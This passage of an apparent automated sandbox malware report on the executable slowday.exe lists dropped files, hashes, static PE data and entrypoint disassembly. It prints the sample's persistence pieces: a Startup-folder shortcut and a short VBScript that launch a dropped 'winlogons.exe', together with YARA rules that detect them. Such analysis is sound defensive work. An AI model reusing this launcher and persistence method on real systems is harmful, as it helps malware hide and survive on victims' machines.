                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                    Simulations

                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    19:15:14API Interceptor7x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                    19:15:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url

                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                    IPs

                                                                                                                                                                                    No context

                                                                                                                                                                                    Domains

                                                                                                                                                                                    No context

                                                                                                                                                                                    ASNs

                                                                                                                                                                                    No context

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    No context

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    No context

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\18da55c1-2652-5cda-252b-e5d7f7077c5d

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):88
                                                                                                                                                                                    Entropy (8bit):5.490292840056112
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:PFYyImXF9mN2RVQON4NgCkCAUdXM:PHRB6+C3xy
                                                                                                                                                                                    MD5:454353131947D1483FF5470107478978
                                                                                                                                                                                    SHA1:C559163C23E5F878BE85D05F3EDEEAA620173C3D
                                                                                                                                                                                    SHA-256:2DF94DC1C58E952A1EBD1AE1185A291A8A573982CA90EC1BBB87B81126002668
                                                                                                                                                                                    SHA-512:C8912DA4654C735F7618B0ABEA7EC0197B17E6E072718B825B5799B2E88CC0E8AE8245CA95E1E5955C3AB8F649CA4ED6529975B142B061ECC402D935401B84DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:LeNF7Goy7uuKWKsmWAhDmhEi2BbZGy27JQQaO8wc/LiRcthbCBcu+4Nt6yYR3dz6dYTg/ZHS1axBPoq2xePo2w==

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhv2307.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x35b8f545, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                                    Entropy (8bit):0.9895781249187471
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:3DdA2Ta0xucRfDw/GiD0Xko5QqbMgSFDb7uBi:1RfDz/y
                                                                                                                                                                                    MD5:A29FCFA1238DD40058924399606698C9
                                                                                                                                                                                    SHA1:113F267240602D5516B2972C04152FB4D451B05D
                                                                                                                                                                                    SHA-256:F32F052AAB7FFAF25E7F9265432B5CB2DB91D7520314AAE253363D23BCEC7D86
                                                                                                                                                                                    SHA-512:3761CF9764F60C9D8E19E5373687395C0C7B2AE37873A24252458B6E41AA34EECE887526555F593BA9EEF177CBE850CD54AE7EFE9E17870AE04592965F8481D6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:5..E... ........1.......te3....wg.......................x..........z..8....ze.h.z.........................6..43....wI.............................................................................................[............B.................................................................................................................. .......8....z.......................................................................................................................................................................................................................................'o</....z.w.................QmP#....z[.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhv8783.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9c149ac1, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                                    Entropy (8bit):0.9565967728175642
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:5GtA2Ta0xucRfDw/ZiD0Xko5QqbMgSFDb7uBi:ARfDM/y
                                                                                                                                                                                    MD5:D6AAAD36F7D6E3DE6ED37B9A4F6BD7E7
                                                                                                                                                                                    SHA1:A0775CE9569D571E9305AAE0592C0BE634B49C14
                                                                                                                                                                                    SHA-256:4D6578EDF445C1292D3ABFA6DC0D182239E20403EBA97B3B46326593F31DD11A
                                                                                                                                                                                    SHA-512:2CA3ADEF3643BD491605327C80E6F79E3D2B490B6B6D9C8E4F5C3B5BB4E424B09F0004FEABA9A7F85643C084F7385B8076DF66C3E857DD06FCA5453FF125742D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:....... ........1.......te3....wg.......................x..........z..8....ze.h.z.........................6..43....wI.............................................................................................[............B.................................................................................................................. .......8....z.......................................................................................................................................................................................................................................B..8....z.w................w...8....ze.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhvAE74.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9c149ac1, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                                    Entropy (8bit):0.9569452727553438
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:5LtA2Ta0xucRfDw/ZiD0Xko5QqbMgSFDb7uBi:/RfDM/y
                                                                                                                                                                                    MD5:3E484594120CF921845E093FA28D203E
                                                                                                                                                                                    SHA1:9330BE53E846459F2DB39B91DF261047A4C94042
                                                                                                                                                                                    SHA-256:D42DFE409DC2D00C82064DB537F05FBA4F8D14053BB334F623D552EA659A1315
                                                                                                                                                                                    SHA-512:E7A5F34D60DD45B2CF899AB4428026F8A5D3FF261F0FEEC64EFF55352BA96A6DF0979D199E64AE0C5D3FC02D95387796E4655723DD31CE47E68204AEA6D76F08
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:....... ........1.......te3....wg.......................x..........z..8....ze.h.z.........................6..43....wI.............................................................................................[............B.................................................................................................................. .......8....z.......................................................................................................................................................................................................................................B..8....z.w................w...8....ze.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhvBB7.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x35b8f545, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                                    Entropy (8bit):0.9895781249187471
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:3DdA2Ta0xucRfDw/GiD0Xko5QqbMgSFDb7uBi:1RfDz/y
                                                                                                                                                                                    MD5:A29FCFA1238DD40058924399606698C9
                                                                                                                                                                                    SHA1:113F267240602D5516B2972C04152FB4D451B05D
                                                                                                                                                                                    SHA-256:F32F052AAB7FFAF25E7F9265432B5CB2DB91D7520314AAE253363D23BCEC7D86
                                                                                                                                                                                    SHA-512:3761CF9764F60C9D8E19E5373687395C0C7B2AE37873A24252458B6E41AA34EECE887526555F593BA9EEF177CBE850CD54AE7EFE9E17870AE04592965F8481D6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:5..E... ........1.......te3....wg.......................x..........z..8....ze.h.z.........................6..43....wI.............................................................................................[............B.................................................................................................................. .......8....z.......................................................................................................................................................................................................................................'o</....z.w.................QmP#....z[.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhvCA97.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9c149ac1, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                                    Entropy (8bit):0.9569452727553438
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:3E484594120CF921845E093FA28D203E
                                                                                                                                                                                    SHA1:9330BE53E846459F2DB39B91DF261047A4C94042
                                                                                                                                                                                    SHA-256:D42DFE409DC2D00C82064DB537F05FBA4F8D14053BB334F623D552EA659A1315
                                                                                                                                                                                    SHA-512:E7A5F34D60DD45B2CF899AB4428026F8A5D3FF261F0FEEC64EFF55352BA96A6DF0979D199E64AE0C5D3FC02D95387796E4655723DD31CE47E68204AEA6D76F08
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:....... ........1.......te3....wg.......................x..........z..8....ze.h.z.........................6..43....wI.............................................................................................[............B.................................................................................................................. .......8....z.......................................................................................................................................................................................................................................B..8....z.w................w...8....ze.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhvCE9E.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9c149ac1, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                                    Entropy (8bit):0.9658018377212408
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:A3DE8A8853138C76F5583A576E75DFFA
                                                                                                                                                                                    SHA1:0644DFDCFFAE7C52A12C2D285BBCB498638D456F
                                                                                                                                                                                    SHA-256:5A9D1B9DE28AE17A1B90FE500DF091517A4BA2DDB66CD2F82BE076A3B872E7B1
                                                                                                                                                                                    SHA-512:E5B08C680A1A79B02311E66C513FC4F9B8BDC3B3FDABA06053FBBC89ED5DE96E58B831BF6F4E80FBEBAAFF6DF2E3C7F592D6B0D350058C64FEE4FABC1ABF3509
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:....... ........1.......te3....wg.......................x..........z..8....ze.h.z.........................6..43....wI.............................................................................................[............B.................................................................................................................. .......8....z.......................................................................................................................................................................................................................................B..8....z.w................w...8....ze.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhvED61.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2dfa5ec5, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                                    Entropy (8bit):0.9895781282475702
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:47BD8351E5AEA2D90AC4C82BC2632289
                                                                                                                                                                                    SHA1:A0FEE3EFD2B3F93726A0DA36CA74211498211778
                                                                                                                                                                                    SHA-256:3864AE293CEE5140D689C2F6CAF0A04E1C0FCD48989C8FDCCD43AE3088A17D88
                                                                                                                                                                                    SHA-512:C63FA6E7C6B80736117AAC493ACF7942096BD4859C48744F42D643C9B9511EE9432CC548188B42BEF7CDCD482CDF782784CC5E699326C47CCD3A4EEAFB5E01E9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:-.^.... ........1.......te3....wg.......................x..........z..8....ze.h.z.........................6..43....wI.............................................................................................[............B.................................................................................................................. .......8....z.......................................................................................................................................................................................................................................eJ.$....z...................QmP#....z[.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp33E2.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp36CB.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp43C.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp8255.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\slowday.exe
                                                                                                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\winlogons\winlogons.exe>), ASCII text, with CR line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):85
                                                                                                                                                                                    Entropy (8bit):4.808742554392863
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:AB33794F41AD76E56615A37D6622EA5C
                                                                                                                                                                                    SHA1:7B5EF2A89CE529D5571631A1A82B312CF8E190E7
                                                                                                                                                                                    SHA-256:B76FE7B226CAE1B013CFEF062E7CDD14B6E4DED9A1BC9200DDBC05535DA25FFD
                                                                                                                                                                                    SHA-512:47CDBC2D60408EC5EB23F1F58C7A11D1BB92B29978EB8E42A3994CA55A7424618BA31353208E50E3F507E59B060767344018DA3FA9D1771C1E4578F91D19BA05
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: URL_File_Local_EXE, Description: Detects an .url file that points to a local executable, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url, Author: Florian Roth
                                                                                                                                                                                    • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
                                                                                                                                                                                    Preview:[InternetShortcut].URL=file:///C:\Users\user\AppData\Roaming\winlogons\winlogons.exe

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\winlogons\winlogons.exe

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\slowday.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2010632
                                                                                                                                                                                    Entropy (8bit):5.999284931960796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:1C7E2FF84A8DA304070EC91B0FFC3051
                                                                                                                                                                                    SHA1:B5E7C2EFE4CDF7AE512F4F1019C87386E7297D97
                                                                                                                                                                                    SHA-256:22887A6408711F60A471787845A385030E039DE5D5929199212886097DB2B610
                                                                                                                                                                                    SHA-512:AA671AA28A394663D50904ED3B664BDE00038B765DAF7EB1EC4FD5C9B5983418300386C8AA7C402A038591CA906053460F7B48C7C0EE524A442C71EB2030A2DB
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...z..\..........".................J.............@.......................... ......2>....@...@.......@.....................L...|....p..l%......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...l%...p...&..................@..@.reloc..0q.......r...<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\winlogons\winlogons.vbs

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\slowday.exe
                                                                                                                                                                                    File Type:ASCII text, with CR line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):127
                                                                                                                                                                                    Entropy (8bit):4.848244463533217
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:15D4DD1FDB941819CD0A875B88758F0E
                                                                                                                                                                                    SHA1:D3473C83D39CB6DD96DDF534AB4037FF32E6136F
                                                                                                                                                                                    SHA-256:3F65EF50D30ADD441269973C0375B01CDF61C5B0656EFDE20A42EA7622398041
                                                                                                                                                                                    SHA-512:B699F52E3A0EB1908B326AEFB6AA5E2F62E116C9CD96D31DE4F3DE87F9E434EDB441D9D553D1C849D5D35E38B7BBE34C3700638D75D94D73C976281ED5FF228D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:Set WshShell = WScript.CreateObject("WScript.Shell") .WshShell.Run """C:\Users\user\AppData\Roaming\winlogons\winlogons.exe"""

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Entropy (8bit):5.999273757037003
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:slowday.exe
                                                                                                                                                                                    File size:2010624
                                                                                                                                                                                    MD5:a172f4b0fa1a44cb60901944cff7f8ed
                                                                                                                                                                                    SHA1:c4aa87ba839c2da6ed852ba0e936ac80d47ec5b5
                                                                                                                                                                                    SHA256:94243b53eceb2662ae632d9c3e02b5b947ea56ac4ac1db3a69fc0ca3e5100816
                                                                                                                                                                                    SHA512:9b2fc878320be1f871b60fbb6dd1507237f3338a8cd5403bd603c37d685aaf9e275b142b1d9f139f1bcf8cbc2044cbea08575bbce159a6c6b3eaf8ee61972061
                                                                                                                                                                                    SSDEEP:24576:FCdxte/80jYLT3U1jfsWa5+hSDZsQ/6XQyS91TzPp5AffmQ:Mw80cTsjkWa5C
                                                                                                                                                                                    TLSH:A595C0D6A39D81E1CD1636F2BD2827835F7A59324A3470193F9A2D5C9E630B2412DFB3
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:aab2e3e39383aa00

                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Entrypoint:0x427f4a
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                                                                                                                                                    Time Stamp:0x5CA40D7A [Wed Apr 3 01:33:46 2019 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                    Instruction
                                                                                                                                                                                    call 00007FDD086C8D2Dh
                                                                                                                                                                                    jmp 00007FDD086BBAF4h
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    int3
                                                                                                                                                                                    push edi
                                                                                                                                                                                    push esi
                                                                                                                                                                                    mov esi, dword ptr [esp+10h]
                                                                                                                                                                                    mov ecx, dword ptr [esp+14h]
                                                                                                                                                                                    mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                                    mov eax, ecx
                                                                                                                                                                                    mov edx, ecx
                                                                                                                                                                                    add eax, esi
                                                                                                                                                                                    cmp edi, esi
                                                                                                                                                                                    jbe 00007FDD086BBC7Ah
                                                                                                                                                                                    cmp edi, eax
                                                                                                                                                                                    jc 00007FDD086BBFDEh
                                                                                                                                                                                    bt dword ptr [004C31FCh], 01h
                                                                                                                                                                                    jnc 00007FDD086BBC79h
                                                                                                                                                                                    rep movsb
                                                                                                                                                                                    jmp 00007FDD086BBF8Ch
                                                                                                                                                                                    cmp ecx, 00000080h
                                                                                                                                                                                    jc 00007FDD086BBE44h
                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                    xor eax, esi
                                                                                                                                                                                    test eax, 0000000Fh
                                                                                                                                                                                    jne 00007FDD086BBC80h
                                                                                                                                                                                    bt dword ptr [004BE324h], 01h
                                                                                                                                                                                    jc 00007FDD086BC150h
                                                                                                                                                                                    bt dword ptr [004C31FCh], 00000000h
                                                                                                                                                                                    jnc 00007FDD086BBE1Dh
                                                                                                                                                                                    test edi, 00000003h
                                                                                                                                                                                    jne 00007FDD086BBE2Eh
                                                                                                                                                                                    test esi, 00000003h
                                                                                                                                                                                    jne 00007FDD086BBE0Dh
                                                                                                                                                                                    bt edi, 02h
                                                                                                                                                                                    jnc 00007FDD086BBC7Fh
                                                                                                                                                                                    mov eax, dword ptr [esi]
                                                                                                                                                                                    sub ecx, 04h
